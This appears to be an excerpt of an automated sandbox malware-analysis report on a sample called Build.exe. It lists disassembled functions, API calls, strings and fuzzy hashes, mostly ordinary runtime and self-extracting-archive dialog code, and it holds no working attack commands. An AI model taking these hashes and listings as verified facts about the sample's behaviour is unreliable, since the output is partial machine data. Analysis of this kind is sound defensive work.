Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: _wcslen$_wcsrchr
String ID: .exe$.rar$.sfx
API String ID: 3513545583-31770016
Opcode ID: b4702e792b9e9f8a330eaaa0d3ce62c2e5464b5594102eaf9d6a21894e279b54
Instruction ID: 990e60926bbc1dc7d4a6925be51d1201d1fa3863cb5faafd26aa5c1c6c0d9437
Opcode Fuzzy Hash: b4702e792b9e9f8a330eaaa0d3ce62c2e5464b5594102eaf9d6a21894e279b54
Instruction Fuzzy Hash: D241F22254071099D7326F348883A3B77F8FF42744B1049CEF9B5AB280E7A0DE85E351

Function 00B4DA1E Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B4DA59
GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00B4BD19,?,?,00000800,?,?,?,00B4BCD4), ref: 00B4DB02
_wcslen.LIBCMT ref: 00B4DB70

Strings

UNC, xrefs: 00B4DAE8
\\?\, xrefs: 00B4DA90, 00B4DADC, 00B4DB38, 00B4DB87

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: _wcslen$CurrentDirectory
String ID: UNC$\\?\
API String ID: 3341907918-253988292
Opcode ID: 5f2299ffd38af6977cf58ae4d42e15cf16253c11efe2e5828ab7ee42a9496982
Instruction ID: 8cbdcd8ccdd943518b25ddafba9cafc9f011b008700a311ba6c93a2367fa09c3
Opcode Fuzzy Hash: 5f2299ffd38af6977cf58ae4d42e15cf16253c11efe2e5828ab7ee42a9496982
Instruction Fuzzy Hash: 184196315043416AD621EF608D81EFF73FCEF56740F0548D9F994E3141E7A49E45E662

Function 00B5D9DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(00000065), ref: 00B5D9ED
GetObjectW.GDI32(00000000,00000018,?), ref: 00B5DA12
DeleteObject.GDI32(00000000), ref: 00B5DA44
DeleteObject.GDI32(00000000), ref: 00B5DA67

Part of subcall function 00B5C652: FindResourceW.KERNELBASE(?,PNG,00000000,?,?,?,00B5DA3D,00000066), ref: 00B5C665
Part of subcall function 00B5C652: SizeofResource.KERNEL32(00000000,?,?,?,00B5DA3D,00000066), ref: 00B5C67C
Part of subcall function 00B5C652: LoadResource.KERNEL32(00000000,?,?,?,00B5DA3D,00000066), ref: 00B5C693
Part of subcall function 00B5C652: LockResource.KERNEL32(00000000,?,?,?,00B5DA3D,00000066), ref: 00B5C6A2
Part of subcall function 00B5C652: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00B5DA3D,00000066), ref: 00B5C6BD
Part of subcall function 00B5C652: GlobalLock.KERNEL32(00000000,?,?,?,?,?,00B5DA3D,00000066), ref: 00B5C6CE
Part of subcall function 00B5C652: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00B5C737
Part of subcall function 00B5C652: GlobalUnlock.KERNEL32(00000000), ref: 00B5C756
Part of subcall function 00B5C652: GlobalFree.KERNEL32(00000000), ref: 00B5C75D

Strings

], xrefs: 00B5DA1A

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
String ID: ]
API String ID: 1428510222-3352871620
Opcode ID: 29e175999b9d53765b828577dd8bd43ae09179d693ee4e184d61ceee03c90c8c
Instruction ID: 2e32df483dc8c0459a76db0ae322ba4f27f46f3bbd95695352ba5ee57dc00a09
Opcode Fuzzy Hash: 29e175999b9d53765b828577dd8bd43ae09179d693ee4e184d61ceee03c90c8c
Instruction Fuzzy Hash: B801C4325447016ADB2277649C0AB7F3EFADB82753F1401D0BD04A7291DF718D0D86A0

Function 00B5F950 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00B41366: GetDlgItem.USER32(00000000,00003021), ref: 00B413AA
Part of subcall function 00B41366: SetWindowTextW.USER32(00000000,00B765F4), ref: 00B413C0

EndDialog.USER32(?,00000001), ref: 00B5F99B
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00B5F9B1
SetDlgItemTextW.USER32(?,00000066,?), ref: 00B5F9C5
SetDlgItemTextW.USER32(?,00000068), ref: 00B5F9D4

Strings

RENAMEDLG, xrefs: 00B5F968

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: d503c3579032c556d1b562e98347f5c61ad9fa1cc63aa486300e7725f7bae866
Instruction ID: caba8063b8670805fcf0b275c1696fcd627f6d733259e5a1b57dbe70ffcee36c
Opcode Fuzzy Hash: d503c3579032c556d1b562e98347f5c61ad9fa1cc63aa486300e7725f7bae866
Instruction Fuzzy Hash: A501B5322887117AE2118B689D4AF77B7DDFB5AB13F2044A5F741A20D0CE62DA188B65

Function 00B6A6C5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00B6A676,?,?,00B6A616,?,00B7F7B0,0000000C,00B6A76D,?,00000002), ref: 00B6A6E5
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B6A6F8
FreeLibrary.KERNEL32(00000000,?,?,?,00B6A676,?,?,00B6A616,?,00B7F7B0,0000000C,00B6A76D,?,00000002,00000000), ref: 00B6A71B

Strings

mscoree.dll, xrefs: 00B6A6DE
CorExitProcess, xrefs: 00B6A6F0

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 17aed8698bb6b6c43a54199d74e99627b023a2203e5d2d2ce07dadad7e48fcdc
Instruction ID: 5f62990076bb5f48f1da4eed22bcda4ec7fa89d323f47ab0477bfb2529594d67
Opcode Fuzzy Hash: 17aed8698bb6b6c43a54199d74e99627b023a2203e5d2d2ce07dadad7e48fcdc
Instruction Fuzzy Hash: F2F04F30A00608BBDF159FA5DC89BADBFF9EB08711F1441A9F909A3161CF355D80CB91

Function 00B651FA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00B652C1
___AdjustPointer.LIBCMT ref: 00B652E4
_abort.LIBCMT ref: 00B65332
___AdjustPointer.LIBCMT ref: 00B65380

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AdjustPointer$_abort
String ID:
API String ID: 2252061734-0
Opcode ID: 1339c26d4a7cd26f510bd41aa95dd4fc4d026e666d06ea62af1bb8239fa74f35
Instruction ID: d89d876b049300a7d948f8a5a695178a8cdd922c783fc53246170c4b63eddbe8
Opcode Fuzzy Hash: 1339c26d4a7cd26f510bd41aa95dd4fc4d026e666d06ea62af1bb8239fa74f35
Instruction Fuzzy Hash: 20510472600A069FDB398F54D991BBAB3E4FF44B40F1444ADEC06872A1D779ECA0CB94

Function 00B6E580 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00B6E589
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B6E5AC

Part of subcall function 00B6BC8E: RtlAllocateHeap.NTDLL(00000000,?,?,?,00B66A24,?,0000015D,?,?,?,?,00B67F00,000000FF,00000000,?,?), ref: 00B6BCC0

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00B6E5D2
_free.LIBCMT ref: 00B6E5E5
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B6E5F4

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: d33e5ddfc5b0a43bae34335de1a09c06b7d6566fcfbf184993ebcc04dd256729
Instruction ID: 5820a25e5bf14569f08185ce6e6825b009f2bf77181a65f5fc5f7a371d7d903b
Opcode Fuzzy Hash: d33e5ddfc5b0a43bae34335de1a09c06b7d6566fcfbf184993ebcc04dd256729
Instruction Fuzzy Hash: 1601D47A6016117F272156B65C8DC7B6AADFEC2B6431401A9B81AD7101FE68CD01C6B0

Function 00B6BA29 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00B6BC80,00B6D7D8,?,00B6B9D3,00000001,00000364,?,00B6688D,?,?,00B850C4), ref: 00B6BA2E
_free.LIBCMT ref: 00B6BA63
_free.LIBCMT ref: 00B6BA8A
SetLastError.KERNEL32(00000000,?,00B850C4), ref: 00B6BA97
SetLastError.KERNEL32(00000000,?,00B850C4), ref: 00B6BAA0

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 92273d86045707b43664980e82bd79d03e3d8a40cf998a847dafa6eda7acf811
Instruction ID: d4011c561356fcde266c1844e2ca67f182189953c2526222ed975c6529e92c91
Opcode Fuzzy Hash: 92273d86045707b43664980e82bd79d03e3d8a40cf998a847dafa6eda7acf811
Instruction Fuzzy Hash: CA01F436604A01AB8216F7B55CD6E6B22FEDBC137172000A8F50AE32A1EF7D8C815160

Function 00B6EE4F Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00B6EE67

Part of subcall function 00B6BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,00B6EEE6,?,00000000,?,00000000,?,00B6EF0D,?,00000007,?,?,00B6F30A,?), ref: 00B6BB10
Part of subcall function 00B6BAFA: GetLastError.KERNEL32(?,?,00B6EEE6,?,00000000,?,00000000,?,00B6EF0D,?,00000007,?,?,00B6F30A,?,?), ref: 00B6BB22

_free.LIBCMT ref: 00B6EE79
_free.LIBCMT ref: 00B6EE8B
_free.LIBCMT ref: 00B6EE9D
_free.LIBCMT ref: 00B6EEAF

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 4770c8f6cf32b546357e87ed1eaaedb32a985eefe8478bf9a5b6c0fda021986b
Instruction ID: f1e6805a82d1ba39acc23376fbed7b072b1f79ab11f78b87eb00836992c9a46d
Opcode Fuzzy Hash: 4770c8f6cf32b546357e87ed1eaaedb32a985eefe8478bf9a5b6c0fda021986b
Instruction Fuzzy Hash: C5F09736504200EF86A4EBA9E986C9A77FEFA007117650889F45ED7551CFB9FC808B64

Function 00B6B160 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00B6B17E

Part of subcall function 00B6BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,00B6EEE6,?,00000000,?,00000000,?,00B6EF0D,?,00000007,?,?,00B6F30A,?), ref: 00B6BB10
Part of subcall function 00B6BAFA: GetLastError.KERNEL32(?,?,00B6EEE6,?,00000000,?,00000000,?,00B6EF0D,?,00000007,?,?,00B6F30A,?,?), ref: 00B6BB22

_free.LIBCMT ref: 00B6B190
_free.LIBCMT ref: 00B6B1A3
_free.LIBCMT ref: 00B6B1B4
_free.LIBCMT ref: 00B6B1C5

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b3060e3549735331976c6bfeeb9aed8d589d06cb1479daccc7d44f37b5bbf0ec
Instruction ID: 4c143c8265965f5e2d2a50828644a81df3139d75efab4d02e5ebe2b918019ccc
Opcode Fuzzy Hash: b3060e3549735331976c6bfeeb9aed8d589d06cb1479daccc7d44f37b5bbf0ec
Instruction Fuzzy Hash: 50F0D0B1820210AFC741EF55FC0388837F6F716725309418AF41A97271CF7A0881CF94

Function 00B53748 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 203COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00B53910
_swprintf.LIBCMT ref: 00B539BF

Strings

%s: %s, xrefs: 00B5391F
%ls, xrefs: 00B53795, 00B537AB

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: acfac63721bb619074b64fdbe94c401418dc885e708a1971354908c50db3d3e3
Instruction ID: 2472c30cd8cea481875ad699d88e9e113feb4efea234cd29d0d18979ba8a49f4
Opcode Fuzzy Hash: acfac63721bb619074b64fdbe94c401418dc885e708a1971354908c50db3d3e3
Instruction Fuzzy Hash: 1B511CF5648304F9F6212AA48DC2F3976E4AB0DF43F1445C6BF87642E1C6A19B5CAF12

Function 00B6A7C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe,00000104), ref: 00B6A800
_free.LIBCMT ref: 00B6A8CB
_free.LIBCMT ref: 00B6A8D5

Strings

C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe, xrefs: 00B6A7F7, 00B6A7FE, 00B6A82D, 00B6A865

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe
API String ID: 2506810119-3642456277
Opcode ID: 773c8e19977bb2b27b026f81d32156ad87161bbdebda97e4f030dbc9f4ee4347
Instruction ID: dc1f46f5cdd186d368a00a39401de59e2e148a0b2440a8c1185cee7c0a06b5cb
Opcode Fuzzy Hash: 773c8e19977bb2b27b026f81d32156ad87161bbdebda97e4f030dbc9f4ee4347
Instruction Fuzzy Hash: 873161B1E00218EFDF21DF99D985D9EBBFCEB85310B1440A6E904A7211DA784E41DFA1

Function 00B657F6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00B6581B
_abort.LIBCMT ref: 00B65926

Strings

RCC, xrefs: 00B65835
MOC, xrefs: 00B6582D

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: EncodePointer_abort
String ID: MOC$RCC
API String ID: 948111806-2084237596
Opcode ID: 3927fe559ecbbd9232410748bff5c8f6fb29dca712190efa8b0c9bf92076a1fb
Instruction ID: 887e664b176de8e41f27afde30a31c00f45e41e2401ce821408b16017a7a8934
Opcode Fuzzy Hash: 3927fe559ecbbd9232410748bff5c8f6fb29dca712190efa8b0c9bf92076a1fb
Instruction Fuzzy Hash: 2E411671900609EFCF25DF94CD81AAEBBF5FF48314F1881A9F905A7251D3399960DB60

Function 00B4F7B8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 77COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 00B4F82D
_strncpy.LIBCMT ref: 00B4F871

Part of subcall function 00B53F47: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00B4F801,00000000,00000000,?,00B85070,?,00B4F801,?,?,00000050,?), ref: 00B53F64

Strings

@%s, xrefs: 00B4F817
$%s, xrefs: 00B4F822

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: ByteCharMultiWide__fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 562999700-834177443
Opcode ID: c32391066d8ea0af1ac03ba68966359ae8d718abcbd5bfc90ad4d8a61eaf4e5b
Instruction ID: a92617c11df98a1d77dd840d81b59cf0a684dbc336d4fd2d8422e26a66a14e70
Opcode Fuzzy Hash: c32391066d8ea0af1ac03ba68966359ae8d718abcbd5bfc90ad4d8a61eaf4e5b
Instruction Fuzzy Hash: 1821397290030ADBDB21DFA48C41BBE77E8FB15700F0405AAF9259B1A1E772EA199B51

Function 00B5CDA0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 00B41366: GetDlgItem.USER32(00000000,00003021), ref: 00B413AA
Part of subcall function 00B41366: SetWindowTextW.USER32(00000000,00B765F4), ref: 00B413C0

EndDialog.USER32(?,00000001), ref: 00B5CE28
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00B5CE3D
SetDlgItemTextW.USER32(?,00000066,?), ref: 00B5CE52

Strings

ASKNEXTVOL, xrefs: 00B5CDB8

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
